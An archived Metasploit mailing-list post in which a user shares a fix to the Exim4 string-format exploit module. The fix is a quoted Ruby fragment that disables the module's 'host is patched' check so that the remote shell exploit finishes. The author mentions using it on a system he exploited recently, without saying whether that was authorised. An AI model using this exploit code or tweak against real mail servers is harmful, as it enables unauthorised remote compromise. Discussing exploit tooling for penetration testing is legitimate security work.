Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Bug in exim4_string_format.rb

From: Ty Miller <tyronmiller () gmail com>
Date: Fri, 17 Jun 2011 15:45:48 +1000
Hey guys,

I had to make a small tweak to the exploit
module msf3/modules/exploits/unix/smtp/exim4_string_format.rb to make it
work on a system that I exploited recently ...

                print_status("Sending second message ...")
                buf = raw_send_recv("MAIL FROM:
#{datastore['MAILFROM']}\r\n")
                # Should be: "sh-x.x$ " !!
                print_status("MAIL result: #{buf.inspect}") if buf

                buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
                # Should be: "sh: RCPT: command not found\n"
                if buf
                        print_status("RCPT result: #{buf.inspect}")
                        if buf !~ /RCPT/
                           *     print_error("Ty: Skipping over RCPT check
exploit bug")*
                            *    #*raise RuntimeError, 'Something went
wrong, perhaps this host is patched?'
                        end
                end

The sh-x.x part was being received when RCPT was expected in the module, so
by commenting it out the module didn't terminate and the exploit worked.

Thx,
Ty

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: